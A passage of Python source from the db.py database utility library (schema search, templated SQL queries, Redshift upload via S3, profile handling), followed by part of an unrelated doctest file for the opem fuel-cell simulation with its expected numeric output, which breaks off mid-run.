f = profile_path(DBPY_PROFILE_ID, profile)
dump_to_json(f, self.to_dict())
@property
def credentials(self):
"""Dict representation of all credentials for the database."""
if self.filename:
db_filename = os.path.join(os.getcwd(), self.filename)
else:
db_filename = None
return {
"username": self.username,
"password": self.password,
"hostname": self.hostname,
"port": self.port,
"filename": db_filename,
"dbname": self.dbname,
"dbtype": self.dbtype,
"schemas": self.schemas,
"limit": self.limit,
"keys_per_column": self.keys_per_column,
}
def find_table(self, search):
"""
Aggresively search through your database's schema for a table.
Parameters
-----------
search: str
glob pattern for what you're looking for
Examples
----------
>>> from db import DemoDB
>>> db = DemoDB()
>>> db.find_table("A*")
+--------+--------------------------+
| Table | Columns |
+--------+--------------------------+
| Album | AlbumId, Title, ArtistId |
| Artist | ArtistId, Name |
+--------+--------------------------+
>>> results = db.find_table("tmp*") # returns all tables prefixed w/ tmp
>>> results = db.find_table("prod_*") # returns all tables prefixed w/ prod_
>>> results = db.find_table("*Invoice*") # returns all tables containing trans
>>> results = db.find_table("*") # returns everything
"""
tables = []
for table in self.tables:
if glob.fnmatch.fnmatch(table.name, search):
tables.append(table)
return TableSet(tables)
def find_column(self, search, data_type=None):
"""
Aggresively search through your database's schema for a column.
Parameters
-----------
search: str
glob pattern for what you're looking for
data_type: str, list
(optional) specify which data type(s) you want to return
Examples
----------
>>> from db import DemoDB
>>> db = DemoDB()
>>> len(db.find_column("Name").columns)
5
>>> len(db.find_column("*Id").columns)
20
>>> len(db.find_column("*Address*").columns)
3
>>> len(db.find_column("*Address*", data_type="NVARCHAR(70)").columns)
3
>>> len(db.find_column("*e*", data_type=["NVARCHAR(70)", "INTEGER"]).columns)
17
-= Should sort in some way for all those doctests to be viable...
-= if not, there's always a random issue where rows are not in the same order, making doctest fail.
db.find_column("Name") # returns all columns named "Name"
+-----------+-------------+---------------+
| Table | Column Name | Type |
+-----------+-------------+---------------+
| Artist | Name | NVARCHAR(120) |
| Genre | Name | NVARCHAR(120) |
| MediaType | Name | NVARCHAR(120) |
| Playlist | Name | NVARCHAR(120) |
| Track | Name | NVARCHAR(200) |
+-----------+-------------+---------------+
db.find_column("*Id") # returns all columns ending w/ Id
+---------------+---------------+---------+
| Table | Column Name | Type |
+---------------+---------------+---------+
| Album | AlbumId | INTEGER |
| Album | ArtistId | INTEGER |
| Artist | ArtistId | INTEGER |
| Customer | SupportRepId | INTEGER |
| Customer | CustomerId | INTEGER |
| Employee | EmployeeId | INTEGER |
| Genre | GenreId | INTEGER |
| Invoice | InvoiceId | INTEGER |
| Invoice | CustomerId | INTEGER |
| InvoiceLine | TrackId | INTEGER |
| InvoiceLine | InvoiceLineId | INTEGER |
| InvoiceLine | InvoiceId | INTEGER |
| MediaType | MediaTypeId | INTEGER |
| Playlist | PlaylistId | INTEGER |
| PlaylistTrack | TrackId | INTEGER |
| PlaylistTrack | PlaylistId | INTEGER |
| Track | TrackId | INTEGER |
| Track | AlbumId | INTEGER |
| Track | MediaTypeId | INTEGER |
| Track | GenreId | INTEGER |
+---------------+---------------+---------+
db.find_column("*Address*") # returns all columns containing Address
+----------+----------------+--------------+
| Table | Column Name | Type |
+----------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Employee | Address | NVARCHAR(70) |
| Invoice | BillingAddress | NVARCHAR(70) |
+----------+----------------+--------------+
db.find_column("*Address*", data_type="NVARCHAR(70)") # returns all columns containing Address that are varchars
+----------+----------------+--------------+
| Table | Column Name | Type |
+----------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Employee | Address | NVARCHAR(70) |
| Invoice | BillingAddress | NVARCHAR(70) |
+----------+----------------+--------------+
db.find_column("*e*", data_type=["NVARCHAR(70)", "INTEGER"]) # returns all columns have an "e" and are NVARCHAR(70)S or INTEGERS
+-------------+----------------+--------------+
| Table | Column Name | Type |
+-------------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Customer | SupportRepId | INTEGER |
| Customer | CustomerId | INTEGER |
| Employee | ReportsTo | INTEGER |
| Employee | EmployeeId | INTEGER |
| Employee | Address | NVARCHAR(70) |
| Genre | GenreId | INTEGER |
| Invoice | InvoiceId | INTEGER |
| Invoice | CustomerId | INTEGER |
| Invoice | BillingAddress | NVARCHAR(70) |
| InvoiceLine | InvoiceLineId | INTEGER |
| InvoiceLine | InvoiceId | INTEGER |
| MediaType | MediaTypeId | INTEGER |
| Track | MediaTypeId | INTEGER |
| Track | Milliseconds | INTEGER |
| Track | GenreId | INTEGER |
| Track | Bytes | INTEGER |
+-------------+----------------+--------------+
"""
if isinstance(data_type, str):
data_type = [data_type]
cols = []
for table in self.tables:
for col in vars(table):
if glob.fnmatch.fnmatch(col, search):
if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type:
continue
if isinstance(getattr(table, col), Column):
cols.append(getattr(table, col))
return ColumnSet(cols)
def _assign_limit(self, q, limit=1000):
# postgres, mysql, & sqlite
if self.dbtype in ["postgres", "redshift", "sqlite", "mysql"]:
if limit:
q = q.rstrip().rstrip(";")
q = "select * from ({q}) q limit {limit}".format(q=q, limit=limit)
return q
# mssql
else:
if limit:
q = "select top {limit} * from ({q}) q".format(limit=limit, q=q)
return q
def _apply_handlebars(self, q, data, union=True):
if (sys.version_info < (3, 0)):
q = unicode(q)
template = self.handlebars.compile(q)
if isinstance(data, list):
query = [template(item) for item in data]
query = [str(item) for item in query]
if union==True:
query = "\nUNION ALL".join(query)
else:
query = "\n".join(query)
elif isinstance(data, dict):
query = template(data)
query = str(query)
else:
return q
return query
def query(self, q, data=None, union=True, limit=None):
"""
Query your database with a raw string.
Parameters
----------
q: str
Query string to execute
data: list, dict
Optional argument for handlebars-queries. Data will be passed to the
template and rendered using handlebars.
union: bool
Whether or not "UNION ALL" handlebars templates. This will return
any handlebars queries as a single data frame.
limit: int
Number of records to return
Examples
--------
>>> from db import DemoDB
>>> db = DemoDB()
db.query("select * from Track").head(2)
TrackId Name AlbumId MediaTypeId \\\r
0 1 For Those About To Rock (We Salute You) 1 1
1 2 Balls to the Wall 2 2
<BLANKLINE>
GenreId Composer Milliseconds Bytes \\\r
0 1 <NAME>, <NAME>, <NAME> 343719 11170334
1 1 None 342562 5510424
<BLANKLINE>
UnitPrice
0 0.99
1 0.99
db.query("select * from Track", limit=10)
TrackId Name AlbumId MediaTypeId \
0 1 For Those About To Rock (We Salute You) 1 1
1 2 Balls to the Wall 2 2
2 3 Fast As a Shark 3 2
3 4 Restless and Wild 3 2
4 5 Princess of the Dawn 3 2
5 6 Put The Finger On You 1 1
6 7 Let's Get It Up 1 1
7 8 Inject The Venom 1 1
8 9 Snowballed 1 1
9 10 Evil Walks 1 1
GenreId Composer Milliseconds \
0 1 <NAME>, <NAME>, <NAME> 343719
1 1 None 342562
2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619
3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051
4 1 Deaffy & R.A. Smith-Diesel 375418
5 1 <NAME>, <NAME>, <NAME> 205662
6 1 <NAME>, <NAME>, <NAME> 233926
7 1 <NAME>, <NAME>, <NAME> 210834
8 1 <NAME>, <NAME>, <NAME> 203102
9 1 <NAME>, <NAME>, <NAME> 263497
Bytes UnitPrice
0 11170334 0.99
1 5510424 0.99
2 3990994 0.99
3 4331779 0.99
4 6290521 0.99
5 6713451 0.99
6 7636561 0.99
7 6852860 0.99
8 6599424 0.99
9 8611245 0.99
>>> q = '''
... SELECT
... a.Title,
... t.Name,
... t.UnitPrice
... FROM
... Album a
... INNER JOIN
... Track t
... on a.AlbumId = t.AlbumId;
... '''
>>> len(db.query(q))
3503
db.query(q, limit=10)
Title \
0 For Those About To Rock We Salute You
1 Balls to the Wall
2 Restless and Wild
3 Restless and Wild
4 Restless and Wild
5 For Those About To Rock We Salute You
6 For Those About To Rock We Salute You
7 For Those About To Rock We Salute You
8 For Those About To Rock We Salute You
9 For Those About To Rock We Salute You
Name UnitPrice
0 For Those About To Rock (We Salute You) 0.99
1 Balls to the Wall 0.99
2 Fast As a Shark 0.99
3 Restless and Wild 0.99
4 Princess of the Dawn 0.99
5 Put The Finger On You 0.99
6 Let's Get It Up 0.99
7 Inject The Venom 0.99
8 Snowballed 0.99
9 Evil Walks 0.99
>>> template = '''
... SELECT
... '{{ name }}' as table_name,
... COUNT(*) as cnt
... FROM
... {{ name }}
... GROUP BY
... table_name
... '''
>>> data = [
... {"name": "Album"},
... {"name": "Artist"},
... {"name": "Track"}
... ]
>>>
db.query(q, data=data)
table_name cnt
0 Album 347
1 Artist 275
2 Track 3503
>>> q = '''
... SELECT
... {{#cols}}
... {{#if @last}}
... {{ . }}
... {{else}}
... {{ . }} ,
... {{/if}}
... {{/cols}}
... FROM
... Album;
... '''
>>> data = {"cols": ["AlbumId", "Title", "ArtistId"]}
>>> len(db.query(q, data=data, union=False))
347
db.query(q, data=data, union=False)
AlbumId Title ArtistId
0 1 For Those About To Rock We Salute You 1
1 2 Balls to the Wall 2
2 3 Restless and Wild 2
3 4 Let There Be Rock 1
4 5 Big Ones 3
"""
if data:
q = self._apply_handlebars(q, data, union)
if limit:
q = self._assign_limit(q, limit)
return pd.read_sql(q, self.con)
def query_from_file(self, filename, data=None, union=True, limit=None):
"""
Query your database from a file.
Parameters
----------
filename: str
A SQL script
data: list, dict
Optional argument for handlebars-queries. Data will be passed to the
template and rendered using handlebars.
union: bool
Whether or not "UNION ALL" handlebars templates. This will return
any handlebars queries as a single data frame.
limit: int
Number of records to return
Examples
--------
>>> from db import DemoDB
>>> db = DemoDB()
>>> q = '''
... SELECT
... a.Title,
... t.Name,
... t.UnitPrice
... FROM
... Album a
... INNER JOIN
... Track t
... on a.AlbumId = t.AlbumId;
... '''
>>> with open("db/tests/myscript.sql", "w") as f:
... f.write(q)
109
>>> len(db.query_from_file("db/tests/myscript.sql", limit=10))
10
db.query_from_file("db/tests/myscript.sql", limit=10)
Title \
0 For Those About To Rock We Salute You
1 Balls to the Wall
2 Restless and Wild
3 Restless and Wild
4 Restless and Wild
5 For Those About To Rock We Salute You
6 For Those About To Rock We Salute You
7 For Those About To Rock We Salute You
8 For Those About To Rock We Salute You
9 For Those About To Rock We Salute You
Name UnitPrice
0 For Those About To Rock (We Salute You) 0.99
1 Balls to the Wall 0.99
2 Fast As a Shark 0.99
3 Restless and Wild 0.99
4 Princess of the Dawn 0.99
5 Put The Finger On You 0.99
6 Let's Get It Up 0.99
7 Inject The Venom 0.99
8 Snowballed 0.99
9 Evil Walks 0.99
"""
with open(filename) as fp:
q = fp.read()
return self.query(q, data=data, union=union, limit=limit)
def _create_sqlite_metatable(self):
"""
SQLite doesn't come with any metatables (at least ones that fit into our
framework), so we're going to create them.
"""
sys.stderr.write("Indexing schema. This will take a second...")
rows_to_insert = []
tables = [row[0] for row in self.cur.execute("select name from sqlite_master where type='table';")]
for table in tables:
for row in self.cur.execute("pragma table_info('{0}')".format(table)):
rows_to_insert.append((table, row[1], row[2]))
# find for table and column names
self.cur.execute("drop table if exists tmp_dbpy_schema;")
self.cur.execute("create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);")
for row in rows_to_insert:
self.cur.execute("insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');".format(*row))
self.cur.execute("SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';")
# find for foreign keys
self.cur.execute("drop table if exists tmp_dbpy_foreign_keys;")
self.cur.execute("create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);")
foreign_keys = []
self.cur.execute("SELECT name, sql FROM sqlite_master ;")
for (table_name, sql) in self.cur:
rgx = "FOREIGN KEY \(\[(.*)\]\) REFERENCES \[(.*)\] \(\[(.*)\]\)"
if sql is None:
continue
for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql):
foreign_keys.append((table_name, column_name, foreign_table, foreign_key))
for row in foreign_keys:
sql_insert = "insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');"
self.cur.execute(sql_insert.format(*row))
self.con.commit()
sys.stderr.write("finished!\n")
def refresh_schema(self, exclude_system_tables=True, use_cache=False):
"""
Pulls your database's schema again and looks for any new tables and
columns.
"""
col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache)
tables = self._gen_tables_from_col_tuples(col_meta)
# Three modes for refreshing schema
# 1. load directly from cache
# 2. use a single query for getting all key relationships
# 3. use the naive approach
if use_cache:
# generate our Tables, and load them into a TableSet
self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t],
keys_per_column=self.keys_per_column,
foreign_keys=table_meta[t]['foreign_keys']['columns'],
ref_keys=table_meta[t]['ref_keys']['columns'])
for t in sorted(tables.keys())])
# optimize the foreign/ref key query by doing it one time, database-wide, if query is available
elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str):
self.cur.execute(self._query_templates['system']['foreign_keys_for_db'])
table_db_foreign_keys = defaultdict(list)
for rel in self.cur:
# second value in relationship tuple is the table name
table_db_foreign_keys[rel[1]].append(rel)
self.cur.execute(self._query_templates['system']['ref_keys_for_db'])
table_db_ref_keys = defaultdict(list)
for rel in self.cur:
# second value in relationship tuple is the table name
table_db_ref_keys[rel[1]].append(rel)
# generate our Tables, and load them into a TableSet
self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],
keys_per_column=self.keys_per_column,
foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t])
for t in sorted(tables.keys())])
elif not use_cache:
self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],
keys_per_column=self.keys_per_column) for t in sorted(tables.keys())])
sys.stderr.write("done!\n")
def _get_db_metadata(self, exclude_system_tables, use_cache):
col_meta = []
table_meta = {}
# pull out column metadata for all tables as list of tuples if told to use cached metadata
if use_cache and self._metadata_cache:
sys.stderr.write("Loading cached metadata. Please wait...")
for table in self._metadata_cache:
# table metadata
table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')}
# col metadata: format as list of tuples, to match how normal loading is performed
for col in table['columns']:
col_meta.append((col['schema'], col['table'], col['name'], col['type']))
else:
sys.stderr.write("Refreshing schema. Please wait...")
if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in \
self._query_templates['system']:
schemas_str = ','.join([repr(schema) for schema in self.schemas])
q = self._query_templates['system']['schema_specified'] % schemas_str
elif exclude_system_tables:
q = self._query_templates['system']['schema_no_system']
else:
q = self._query_templates['system']['schema_with_system']
self.cur.execute(q)
col_meta = self.cur
return col_meta, table_meta
def _gen_tables_from_col_tuples(self, cols):
tables = {}
# generate our Columns, and attach to each table to the table name in dict
for (table_schema, table_name, column_name, data_type) in cols:
if table_name not in tables:
tables[table_name] = []
tables[table_name].append(Column(self.con, self._query_templates, table_schema,
table_name, column_name, data_type, self.keys_per_column))
return tables
def _try_command(self, cmd):
try:
self.cur.execute(cmd)
except Exception as e:
print ("Error executing command:")
print ("\t '{0}'".format(cmd))
print ("Exception: {0}".format(e))
self.con.rollback()
def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000,
AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None,
print_sql=False, bucket_location=None, s3_bucket=None):
"""
Upload a dataframe to redshift via s3.
Parameters
----------
name: str
name for your shiny new table
df: DataFrame
data frame you want to save to the db
drop_if_exists: bool (False)
whether you'd like to drop the table if it already exists
chunk_size: int (10000)
Number of DataFrame chunks to upload and COPY from S3. Upload speed
is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes
have 2 slices per node, so if running 2 nodes you will want
chunk_size=4, 8, etc
AWS_ACCESS_KEY: str
your aws access key. if this is None, the function will try
and grab AWS_ACCESS_KEY from your environment variables
AWS_SECRET_KEY: str
your aws secrety key. if this is None, the function will try
and grab AWS_SECRET_KEY from your environment variables
s3: S3
alternative to using keys, you can use an S3 object
print_sql: bool (False)
option for printing sql statement that will be executed
bucket_location: boto.s3.connection.Location
a specific AWS location in which to create the temporary transfer s3
bucket. This should match your redshift cluster's region.
Examples
--------
"""
if self.dbtype!="redshift":
raise Exception("Sorry, feature only available for redshift.")
try:
from boto.s3.connection import S3Connection
from boto.s3.key import Key
from boto.s3.connection import Location
# if boto is present, set the bucket_location to default.
# we can't do this in the function definition because we're
# lazily importing boto only if necessary here.
if bucket_location is None:
bucket_location = Location.DEFAULT
except ImportError:
raise Exception("Couldn't find boto library. Please ensure it is installed")
if s3 is not None:
AWS_ACCESS_KEY = s3.access_key
AWS_SECRET_KEY = s3.secret_key
if AWS_ACCESS_KEY is None:
AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY')
if AWS_SECRET_KEY is None:
AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY')
if AWS_ACCESS_KEY is None:
raise Exception("Must specify AWS_ACCESS_KEY as either function argument or as an environment variable `AWS_ACCESS_KEY`")
if AWS_SECRET_KEY is None:
raise Exception("Must specify AWS_SECRET_KEY as either function argument or as an environment variable `AWS_SECRET_KEY`")
conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)
#this way users with permission on specific buckets can use this feature
bucket_name = "dbpy-{0}".format(uuid.uuid4())
if s3_bucket:
bucket = conn.get_bucket(s3_bucket)
bucket_name = s3_bucket
else:
bucket = conn.create_bucket(bucket_name, location=bucket_location)
# we're going to chunk the file into pieces. according to amazon, this is
# much faster when it comes time to run the \COPY statment.
#
# see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html
sys.stderr.write("Transfering {0} to s3 in chunks".format(name))
len_df = len(df)
chunks = range(0, len_df, chunk_size)
def upload_chunk(i):
conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)
chunk = df[i:(i+chunk_size)]
k = Key(bucket)
k.key = '<KEY>' % (i, i + chunk_size)
k.set_metadata('parent', 'db.py')
out = StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(chunk.to_csv(index=False, encoding='utf-8'))
k.set_contents_from_string(out.getvalue())
sys.stderr.write(".")
return i
threads = []
for i in chunks:
t = threading.Thread(target=upload_chunk, args=(i, ))
t.start()
threads.append(t)
# join all threads
for t in threads:
t.join()
sys.stderr.write("done\n")
if drop_if_exists:
sql = "DROP TABLE IF EXISTS {0};".format(name)
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
# generate schema from pandas and then adapt for redshift
sql = pd.io.sql.get_schema(df, name)
# defaults to using SQLite format. need to convert it to Postgres
sql = sql.replace("[", "").replace("]", "")
# we'll create the table ONLY if it doens't exist
sql = sql.replace("CREATE TABLE", "CREATE TABLE IF NOT EXISTS")
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
self.con.commit()
# perform the \COPY here. the s3 argument is a prefix, so it'll pick up
# all of the data*.gz files we've created
sys.stderr.write("Copying data from s3 to redshfit...")
sql = """
copy {name} from 's3://{bucket_name}/data'
credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}'
CSV IGNOREHEADER as 1 GZIP;
""".format(name=name, bucket_name=bucket_name,
AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY)
if print_sql:
sys.stderr.write(sql + "\n")
self._try_command(sql)
self.con.commit()
sys.stderr.write("done!\n")
# tear down the bucket
sys.stderr.write("Tearing down bucket...")
for key in bucket.list():
key.delete()
if not s3_bucket:
conn.delete_bucket(bucket_name)
sys.stderr.write("done!")
def to_dict(self):
"""Dict representation of the database as credentials plus tables dict representation."""
db_dict = self.credentials
db_dict.update(self.tables.to_dict())
return db_dict
def list_profiles():
"""
Lists all of the database profiles available
Examples
--------
No doctest, covered by unittest
list_profiles()
{'demo': {u'dbname': None,
u'dbtype': u'sqlite',
u'filename': u'/Users/glamp/repos/yhat/opensource/db.py/db/data/chinook.sqlite',
u'hostname': u'localhost',
u'password': None,
u'port': 5432,
u'username': None},
'muppets': {u'dbname': u'muppetdb',
u'dbtype': u'postgres',
u'filename': None,
u'hostname': u'muppets.yhathq.com',
u'password': <PASSWORD>,
u'port': 5432,
u'username': u'kermit'}}
"""
profiles = {}
user = os.path.expanduser("~")
for f in os.listdir(user):
if f.startswith(".db.py_"):
profile = load_from_json(os.path.join(user, f))
tables = profile.pop('tables', None)
if tables:
profile['metadata'] = True
else:
profile['metadata'] = False
profiles[f[7:]] = profile
return profiles
def remove_profile(name, s3=False):
"""
Removes a profile from your config
"""
user = os.path.expanduser("~")
if s3:
f = os.path.join(user, S3_PROFILE_ID + name)
else:
f = os.path.join(user, DBPY_PROFILE_ID + name)
try:
try:
open(f)
except:
raise Exception("Profile '{0}' does not exist. Could not find file {1}".format(name, f))
os.remove(f)
except Exception as e:
raise Exception("Could not remove profile {0}! Excpetion: {1}".format(name, e))
def DemoDB(keys_per_column=None, **kwargs):
"""
Provides an instance of DB that hooks up to the Chinook DB
See http://chinookdatabase.codeplex.com/ for more info.
"""
_ROOT = os.path.abspath(os.path.dirname(__file__))
chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite')
return DB(filename=chinook, dbtype='sqlite', keys_per_column=keys_per_column, **kwargs)
|
opem/Test/test_Padulles_Amphlett.py | Martenet/opem | 173 | 12797517 | # -*- coding: utf-8 -*-
'''
>>> from opem.Dynamic.Padulles_Amphlett import *
>>> import shutil
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":343,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":0.1,"i-stop":4,"i-step":0.1,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.0684154992732005 V
Eta Activation : 0.18557231242539243 V
Eta Concentration : 1.948431634418616e-05 V
Eta Ohmic : 0.00017548304819292376 V
FC Efficiency : 0.6589203974773784
FC Power : 0.5139579100323552 W
FC Voltage : 5.1395791003235525 V
Loss : 0.18576727978992955 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 0.1010420899676448 W
###########
I : 0.2
E : 6.068413961701556 V
Eta Activation : 0.23146009851376736 V
Eta Concentration : 3.899435456560147e-05 V
Eta Ohmic : 0.0003510800160998837 V
FC Efficiency : 0.6293798842665886
FC Power : 0.9818326194558784 W
FC Voltage : 4.909163097279392 V
Loss : 0.23185017288443285 V
PH2 : 0.1971566919511875 atm
PH2O : 0.24266586776736396 atm
PO2 : 0.1906184358000996 atm
Power-Thermal : 0.24816738054412169 W
###########
I : 0.3
E : 6.068412424065923 V
Eta Activation : 0.2583036192079603 V
Eta Concentration : 5.853018266659147e-05 V
Eta Ohmic : 0.0005267910327125488 V
FC Efficiency : 0.6120471438396443
FC Power : 1.4321903165847678 W
FC Voltage : 4.7739677219492265 V
Loss : 0.25888894042333943 V
PH2 : 0.19714264156957312 atm
PH2O : 0.24264857417203542 atm
PO2 : 0.1906105029619013 atm
Power-Thermal : 0.41280968341523216 W
###########
I : 0.4
E : 6.068410886366294 V
Eta Activation : 0.27735002084480426 V
Eta Concentration : 7.809186891953766e-05 V
Eta Ohmic : 0.0007026162388380664 V
FC Efficiency : 0.5997124668722417
FC Power : 1.8711028966413943 W
FC Voltage : 4.677757241603485 V
Loss : 0.27813072895256186 V
PH2 : 0.19712859118795872 atm
PH2O : 0.24263128057670688 atm
PO2 : 0.19060257012370302 atm
Power-Thermal : 0.588897103358606 W
###########
I : 0.5
E : 6.068409348602667 V
Eta Activation : 0.2921240370409447 V
Eta Concentration : 9.76794818682758e-05 V
Eta Ohmic : 0.0008785557847524419 V
FC Efficiency : 0.5901164085980564
FC Power : 2.30145399353242 W
FC Voltage : 4.60290798706484 V
Loss : 0.2931002723075654 V
PH2 : 0.19711454080634436 atm
PH2O : 0.24261398698137834 atm
PO2 : 0.1905946372855047 atm
Power-Thermal : 0.7735460064675803 W
###########
I : 0.6
E : 6.0684078107750326 V
Eta Activation : 0.3041956781419353 V
Eta Concentration : 0.00011729309032954864 V
Eta Ohmic : 0.0010546098289093816 V
FC Efficiency : 0.5822525519832258
FC Power : 2.724941943281497 W
FC Voltage : 4.541569905469162 V
Loss : 0.30536758106117423 V
PH2 : 0.19710049042472996 atm
PH2O : 0.2425966933860498 atm
PO2 : 0.1905867044473064 atm
Power-Thermal : 0.9650580567185031 W
###########
I : 0.7
E : 6.068406272883388 V
Eta Activation : 0.31440243547871893 V
Eta Concentration : 0.00013693276339445145 V
Eta Ohmic : 0.0012307785370829418 V
FC Efficiency : 0.5755840434599239
FC Power : 3.1426888772911847 W
FC Voltage : 4.489555538987407 V
Loss : 0.3157701467791963 V
PH2 : 0.19708644004311557 atm
PH2O : 0.24257939979072127 atm
PO2 : 0.19057877160910808 atm
Power-Thermal : 1.1623111227088154 W
###########
I : 0.8
E : 6.068404734927729 V
Eta Activation : 0.3232442167420945 V
Eta Concentration : 0.00015659857042988755 V
Eta Ohmic : 0.0014070620817435461 V
FC Efficiency : 0.569790429225178
FC Power : 3.555492278365111 W
FC Voltage : 4.4443653479563885 V
Loss : 0.324807877394268 V
PH2 : 0.19707238966150117 atm
PH2O : 0.24256210619539273 atm
PO2 : 0.1905708387709098 atm
Power-Thermal : 1.3645077216348895 W
###########
I : 0.9
E : 6.068403196908046 V
Eta Activation : 0.3310434726426763 V
Eta Concentration : 0.0001762905810800498 V
Eta Ohmic : 0.0015834606415773538 V
FC Efficiency : 0.5646650099463304
FC Power : 3.96394836982324 W
FC Voltage : 4.404387077581378 V
Loss : 0.3328032238653337 V
PH2 : 0.19705833927988675 atm
PH2O : 0.24254481260006414 atm
PO2 : 0.19056290593271147 atm
Power-Thermal : 1.5710516301767605 W
###########
I : 1.0
E : 6.068401658824337 V
Eta Activation : 0.33802037026202836 V
Eta Concentration : 0.0001960088652678871 V
Eta Ohmic : 0.0017599744011013664 V
FC Efficiency : 0.5600666527156857
FC Power : 4.368519891182348 W
FC Voltage : 4.368519891182348 V
Loss : 0.3399763535283976 V
PH2 : 0.19704428889827239 atm
PH2O : 0.2425275190047356 atm
PO2 : 0.1905549730945132 atm
Power-Thermal : 1.781480108817652 W
###########
I : 1.1
E : 6.068400120676597 V
Eta Activation : 0.3443319458183834 V
Eta Concentration : 0.00021575349319660598 V
Eta Ohmic : 0.0019366035503462617 V
FC Efficiency : 0.55589469312397
FC Power : 4.769576467003663 W
FC Voltage : 4.335978606366966 V
Loss : 0.3464843028619262 V
PH2 : 0.197030238516658 atm
PH2O : 0.24251022540940706 atm
PO2 : 0.19054704025631486 atm
Power-Thermal : 1.9954235329963377 W
###########
I : 1.2
E : 6.068398582464819 V
Eta Activation : 0.35009414904739194 V
Eta Concentration : 0.00023552453535116493 V
Eta Ohmic : 0.002113348284589288 V
FC Efficiency : 0.5520748042471996
FC Power : 5.1674201677537885 W
FC Voltage : 4.306183473128157 V
Loss : 0.3524430218673324 V
PH2 : 0.1970161881350436 atm
PH2O : 0.24249293181407852 atm
PO2 : 0.19053910741811658 atm
Power-Thermal : 2.212579832246212 W
###########
I : 1.3
E : 6.068397044188998 V
Eta Activation : 0.35539503345654255 V
Eta Concentration : 0.0002553220624997795 V
Eta Ohmic : 0.0022902088041253615 V
FC Efficiency : 0.5485505413555333
FC Power : 5.562302489345107 W
FC Voltage : 4.27869422257316 V
Loss : 0.3579405643231677 V
PH2 : 0.19700213775342923 atm
PH2O : 0.24247563821874998 atm
PO2 : 0.19053117457991825 atm
Power-Thermal : 2.432697510654893 W
###########
I : 1.4
E : 6.06839550584913 V
Eta Activation : 0.36030304442922906 V
Eta Concentration : 0.00027514614569545357 V
Eta Ohmic : 0.0024671853140681515 V
FC Efficiency : 0.5452780290261753
FC Power : 5.954436076965834 W
FC Voltage : 4.253168626404167 V
Loss : 0.36304537588899266 V
PH2 : 0.19698808737181484 atm
PH2O : 0.24245834462342142 atm
PO2 : 0.19052324174171997 atm
Power-Thermal : 2.6555639230341663 W
###########
I : 1.5
E : 6.068393967445208 V
Eta Activation : 0.3648724409731032 V
Eta Concentration : 0.0002949968562774962 V
Eta Ohmic : 0.002644278024175193 V
FC Efficiency : 0.5422224856637728
FC Power : 6.344003082266143 W
FC Voltage : 4.229335388177429 V
Loss : 0.3678117158535559 V
PH2 : 0.19697403699020044 atm
PH2O : 0.24244105102809288 atm
PO2 : 0.19051530890352164 atm
Power-Thermal : 2.8809969177338575 W
###########
I : 1.6
E : 6.068392428977227 V
Eta Activation : 0.36914696409844006 V
Eta Concentration : 0.0003148742658730733 V
Eta Ohmic : 0.0028214871486926026 V
FC Efficiency : 0.5393558719759229
FC Power : 6.731161282259518 W
FC Voltage : 4.206975801412199 V
Loss : 0.37228332551300575 V
PH2 : 0.19695998660858605 atm
PH2O : 0.24242375743276434 atm
PO2 : 0.19050737606532336 atm
Power-Thermal : 3.1088387177404826 W
###########
I : 1.7
E : 6.068390890445182 V
Eta Activation : 0.3731623911228729 V
Eta Concentration : 0.0003347784463987542 V
Eta Ohmic : 0.0029988129062160497 V
FC Efficiency : 0.5366552535984287
FC Power : 7.116048662715165 W
FC Voltage : 4.185910978067744 V
Loss : 0.3764959824754877 V
PH2 : 0.19694593622697168 atm
PH2O : 0.2424064638374358 atm
PO2 : 0.19049944322712503 atm
Power-Thermal : 3.338951337284836 W
###########
I : 1.8
E : 6.068389351849069 V
